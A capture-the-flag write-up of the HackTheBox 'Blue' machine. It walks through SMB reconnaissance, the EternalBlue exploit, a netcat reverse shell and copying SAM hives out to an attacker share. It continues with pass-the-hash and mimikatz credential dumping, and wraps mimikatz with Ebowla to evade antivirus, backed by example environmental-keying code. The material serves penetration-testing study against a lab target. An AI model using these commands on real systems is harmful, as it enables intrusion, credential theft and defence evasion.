# BLUE

## Reconnaissance

### nmap

First a SYN sweep of all 65535 TCP ports, skipping host discovery (`-Pn`) and DNS resolution (`-n`), with greppable output so the open-port list can be pulled out for the second scan:

```
nmap -sS --min-rate 5000 -p- -Pn -n 10.10.10.40 -oG allPorts
```

![](https://i.imgur.com/5Rwk0IO.png)

`--min-rate 5000` trades accuracy for speed; it is fine on a lab VPN but can miss ports on a lossy link, so anything unexpected is worth re-scanning at a lower rate. Then a version and default-script scan (`-sCV`) against only the ports found open:

```
┌─[root@cr4y0-PC]─[/home/cr4y0/Desktop/HackTheBox/BLUE]
└──╼ #nmap -sCV -p135,139,445,49152,49153,49154,49155,49156,49157 10.10.10.40 -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-22 13:33 -05
Nmap scan report for 10.10.10.40
Host is up (0.22s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-07-22T23:35:43
|_  start_date: 2022-07-22T22:45:41
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-07-23T00:35:44+01:00
|_clock-skew: mean: 4h40m03s, deviation: 34m35s, median: 5h00m01s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.40 seconds
```

Three things stand out: Windows 7 Professional SP1 (build 7601) with SMB exposed on 445, SMB1 message signing disabled, and SMB2 signing "enabled but not required". The first is the classic MS17-010 profile; the signing settings would also allow NTLM relay, although that is not needed here.

### crackmapexec

```
cme smb 10.10.10.40
```

![](https://i.imgur.com/Ys7oqDD.png)

To list the categories declared by the installed `.nse` scripts:

```
locate .nse | xargs grep "categories" | grep -oP '".*?"' | sort -u
```

![](https://i.imgur.com/jxlnM4X.png)

Of these, the "vuln" and "safe" categories are used. The `and` keeps only scripts tagged with both, so intrusive vulnerability checks stay out of the first run; `smb-vuln-ms17-010` is tagged `vuln` and `safe`, so it is included:

```
nmap --script "vuln and safe" -p135,139,445 10.10.10.40
```

![](https://i.imgur.com/pAQz8QB.png)

The `smb-vuln*` glob then runs every SMB vulnerability script, intrusive ones included:

```
nmap --script smb-vuln* -p139,445 10.10.10.40
```

![](https://i.imgur.com/oBqNzZM.png)

The host is reported vulnerable to MS17-010 (EternalBlue).

## Manual exploitation - zzz_exploit

The checker and exploit come from worawit's MS17-010 repository:

```
https://github.com/worawit/MS17-010
```

```
python2 checker.py 10.10.10.40
```

![](https://i.imgur.com/LhlmMzu.png)

If any of the named pipes comes back as `OK`, we can execute commands through it. Both scripts default to an empty username; on Windows 7 the anonymous session is often denied on every pipe while `guest` works, so changing `USERNAME = 'guest'` can make the difference:

![](https://i.imgur.com/WX6k2lK.png)

```
python2 checker.py 10.10.10.40
```

![](https://i.imgur.com/YYbcjne.png)

Set `USERNAME = 'guest'` in `zzz_exploit.py` as well:

![](https://i.imgur.com/2n4n3B8.png)

![](https://i.imgur.com/P62Ntdf.png)

Now download the Windows netcat from `https://eternallybored.org/misc/netcat/` and serve the current directory as an SMB share, so the target can fetch `nc.exe` from `\\10.10.14.6\smbFolder`:

```
impacket-smbserver smbFolder $(pwd) -smb2support
```

![](https://i.imgur.com/1Cfrp50.png)

Run the exploit through the `samr` pipe, with the command it executes edited (see the images) to launch `nc.exe` from the share back to our listener:

```
python2 zzz_exploit.py 10.10.10.40 samr
```

![](https://i.imgur.com/MYY0jkz.png)

The listener on our side (`rlwrap` gives the Windows shell line editing and history):

```
rlwrap nc -nvlp 4343
```

![](https://i.imgur.com/TQATR7T.png)

## Post Exploitation

On Windows, the credentials of logged-on users are kept in LSASS memory and can be dumped with mimikatz. Because the exploit shell runs as SYSTEM, the local SAM can also be taken straight from the registry, which is done first.
```
reg save HKLM\system system.backup
reg save HKLM\sam sam.backup
```

![](https://i.imgur.com/VKobRLD.png)

Copy both hives to the SMB share started earlier:

```
copy system.backup \\10.10.14.6\smbFolder\system
copy sam.backup \\10.10.14.6\smbFolder\sam
```

![](https://i.imgur.com/aVXOlR4.png)

The SYSTEM hive holds the boot key that encrypts the SAM, so with both files secretsdump can extract the local users' hashes offline:

```
secretsdump.py -sam sam -system system LOCAL
```

Now get mimikatz from

```
https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2
```

To get mimikatz onto the victim past Defender or any other protection on the system, the binary is wrapped with Ebowla:

![](https://i.imgur.com/kZu6TYe.png)

### Pass The Hash

The NT hashes from secretsdump authenticate to SMB directly (crackmapexec's `-H`), so no cracking is needed:

![](https://i.imgur.com/KkHchdA.png)

### EBOWLA

![](https://i.imgur.com/LqjPaE4.png)

Adjust `genetic.config`:

![](https://i.imgur.com/7jKFC8x.png)

![](https://i.imgur.com/Ih22t9i.png)

Ebowla derives the payload's key from environment values on the target, so they have to be collected from the shell first:

```
echo %username%
HARIS-PC$
echo %computername%
HARIS-PC
echo %Number_of_processors%
2
echo %processor_identifier%
AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
echo %path%
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;
```

Note that `%username%` reads `HARIS-PC$` because this shell runs as SYSTEM; keying on it ties the binary to that context, and it will not unpack in an ordinary user session.

![](https://i.imgur.com/wvhuOmu.png)

```
python2 ebowla.py /home/cr4y0/Desktop/HackTheBox/BLUE/mimikatz/x64/mimikatz.exe genetic.config
```

![](https://i.imgur.com/eEoeFJd.png)

```
./build_x64_go.sh output/go_symmetric_mimikatz.exe.go final_mimi.exe
```

![](https://i.imgur.com/QH9Clbg.png)

Transfer the obfuscated binary to the target and run it:

```
.\final_mimi.exe
```

![](https://i.imgur.com/h4xEUbM.png)

```
privilege::debug
```

![](https://i.imgur.com/9lGFvbP.png)

```
sekurlsa::logonPasswords
```

![](https://i.imgur.com/VIzeVMn.png)

The Administrator's plaintext password shows up in the logon data; confirm it with crackmapexec:

```
cme smb 10.10.10.40 -u 'Administrator' -p 'ejfnIWWDojfWEKM'
```

![](https://i.imgur.com/MiPJhpU.png)

### rdp

Enable RDP with crackmapexec's `rdp` module, which sets the Terminal Server `fDenyTSConnections` registry value to 0:

```
cme smb 10.10.10.40 -u 'Administrator' -p 'ejfnIWWDojfWEKM' -M rdp -o action=enable
```

![](https://i.imgur.com/wYjSPao.png)

![](https://i.imgur.com/eXCShoR.png)

## Resources
https://refabr1k.gitbook.io/oscp/info-gathering/smb

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb

https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html#nmblookup

Another set of SMB one-liners for nmap:

```
# smb enum script
nmap -p 139,445 --script smb-enum-users <ipaddress_here>

# Checks for OS of SMB
nmap -v -p 139,445 --script smb-os-discovery 10.11.24.85

# Checks for smb vulnerability
nmap -v -p 139,445 --script vuln <ipaddress_here>
nmap --script smb-vuln* -p 139,445 [ip]

# Dump interesting information
nmap --script "safe or smb-enum-*" -p 445 <IP>

# Bruteforce User Credentials
nmap --script smb-brute -p 445 <IP>

# List Shares
nmap --script smb-enum-shares -p 139,445 [ip]
```
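Going back to the Ebowla step: the reason the `%username%`, `%computername%` and processor values were collected on the target is environmental keying, in which the payload key is derived from those values rather than stored in the binary. The block below is an added teaching example and is not Ebowla's code, key schedule or file format; it uses only the Python standard library (PBKDF2 for the key and an HMAC-SHA256 counter-mode keystream as a stand-in for a real cipher) to show the property that matters: the sealed blob carries only the variable names, a salt and a nonce, so it unpacks on a host where the live environment matches and fails closed everywhere else. `TARGET_ENV` mirrors the values read from HARIS-PC above; `PAYLOAD` is a constructed stand-in for the mimikatz bytes.

```python
"""Environmental keying in miniature (added example; not Ebowla's implementation)."""
import hashlib
import hmac
import os

# The checks genetic.config asks for, filled with the values read on the target.
# Only ENV_NAMES travels with the loader; the values are never embedded.
TARGET_ENV = {
    "USERNAME": "HARIS-PC$",
    "COMPUTERNAME": "HARIS-PC",
    "NUMBER_OF_PROCESSORS": "2",
}
ENV_NAMES = list(TARGET_ENV)

# Constructed stand-in for the real executable bytes.
PAYLOAD = b"MZ\x90\x00constructed stand-in for mimikatz.exe bytes"


def derive_key(names, environ, salt):
    """Key = PBKDF2(NAME=VALUE pairs in a fixed order). Windows treats these
    names and values case-insensitively, so case is normalised first."""
    material = "\0".join(f"{n}={environ.get(n, '')}".upper() for n in names).encode()
    return hashlib.pbkdf2_hmac("sha256", material, salt, 200_000, dklen=32)


def _keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode; a teaching stand-in for a stream cipher."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(8, "big"), "sha256").digest()
        block += 1
    return bytes(out[:length])


def seal(payload, names, environ):
    """Build the blob the loader carries: salt | nonce | tag | ciphertext."""
    salt, nonce = os.urandom(16), os.urandom(16)
    key = derive_key(names, environ, salt)
    ct = bytes(p ^ k for p, k in zip(payload, _keystream(key, nonce, len(payload))))
    tag = hmac.new(key, nonce + ct, "sha256").digest()
    return salt + nonce + tag + ct


def unseal(blob, names, environ):
    """What the loader does on the host: re-derive the key from the live
    environment and release the payload only if the tag verifies."""
    salt, nonce, tag, ct = blob[:16], blob[16:32], blob[32:64], blob[64:]
    key = derive_key(names, environ, salt)
    expected = hmac.new(key, nonce + ct, "sha256").digest()
    if not hmac.compare_digest(tag, expected):
        return None  # wrong host: no plaintext and no partial decrypt
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


def demo():
    """Seal for HARIS-PC as SYSTEM, then try it on the right host, on the same
    host as the interactive user, and check the blob leaks no env value."""
    blob = seal(PAYLOAD, ENV_NAMES, TARGET_ENV)
    on_target = unseal(blob, ENV_NAMES, TARGET_ENV)
    as_user = unseal(blob, ENV_NAMES, {**TARGET_ENV, "USERNAME": "haris"})
    return on_target == PAYLOAD, as_user is None, b"HARIS" not in blob


if __name__ == "__main__":
    print(demo())  # prints (True, True, True)
```

The second result is the caveat from the env-collection step: keyed on `USERNAME=HARIS-PC$`, the wrapper only works under SYSTEM. The third is why the technique frustrates sandboxes and analysts: without the matching environment there is nothing in the blob to decrypt, only a key derivation to brute-force.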
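The two-stage scan at the top (`-oG allPorts`, then `-sCV` on the open ports) needs the port list extracted from the greppable file. The helper below is an added example, not part of the write-up: it parses nmap's `-oG` `Host:` / `Ports:` lines, where each entry is `port/state/proto/owner/service/rpc/version/`, filters by state and protocol, and builds the follow-up command. `SAMPLE_OG` and `SAMPLE_OG_UDP` are constructed to match the first scan above; real `allPorts` files have the same layout.

```python
"""Open-port extraction from nmap greppable (-oG) output (added example)."""
import re

# Constructed -oG output for the all-ports scan above.
SAMPLE_OG = """\
# Nmap 7.92 scan initiated Fri Jul 22 13:30:01 2022 as: nmap -sS --min-rate 5000 -p- -Pn -n -oG allPorts 10.10.10.40
Host: 10.10.10.40 ()\tStatus: Up
Host: 10.10.10.40 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 49152/open/tcp//msrpc///, 49153/open/tcp//msrpc///, 49154/open/tcp//msrpc///, 49155/open/tcp//msrpc///, 49156/open/tcp//msrpc///, 49157/open/tcp//msrpc///\tIgnored State: filtered (65526)
# Nmap done at Fri Jul 22 13:32:00 2022 -- 1 IP address (1 host up) scanned in 118.22 seconds
"""

# Constructed UDP scan line; open|filtered is what a silent UDP port looks like.
SAMPLE_OG_UDP = (
    "Host: 10.10.10.40 ()\tPorts: 137/open/udp//netbios-ns///, "
    "161/open|filtered/udp//snmp///\tIgnored State: closed (998)\n"
)

# 'Host: <ip> (<name>)\tPorts: <entries>\t...' ; the Status-only line has no Ports field.
HOST_LINE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\s+Ports:\s+(?P<ports>[^\t]*)")


def parse_greppable(text):
    """Return {ip: [(port, state, proto, service), ...]} for every Ports: line."""
    result = {}
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if not m:
            continue
        entries = []
        for item in m["ports"].split(", "):
            fields = item.split("/")
            if len(fields) < 5 or not fields[0].isdigit():
                continue  # tolerate a truncated or hand-edited entry
            entries.append((int(fields[0]), fields[1], fields[2], fields[4]))
        result.setdefault(m["ip"], []).extend(entries)
    return result


def open_ports(text, ip, proto="tcp", include_open_filtered=False):
    """Sorted, de-duplicated ports in state open (optionally open|filtered)."""
    states = {"open", "open|filtered"} if include_open_filtered else {"open"}
    return sorted(
        {p for p, st, pr, _ in parse_greppable(text).get(ip, []) if pr == proto and st in states}
    )


def targeted_scan(text, ip, output="targeted"):
    """The follow-up -sCV command for one host, or None when nothing is open."""
    ports = open_ports(text, ip)
    if not ports:
        return None
    return f"nmap -sCV -p{','.join(map(str, ports))} {ip} -oN {output}"


if __name__ == "__main__":
    print(targeted_scan(SAMPLE_OG, "10.10.10.40"))
```

Feed it the real file with `targeted_scan(open("allPorts").read(), "10.10.10.40")`. Keeping `open|filtered` out by default matters for the TCP case: with `-Pn` against a firewalled Windows host the remaining 65526 ports are filtered, and nmap only lists them under "Ignored State", so they never reach the targeted scan.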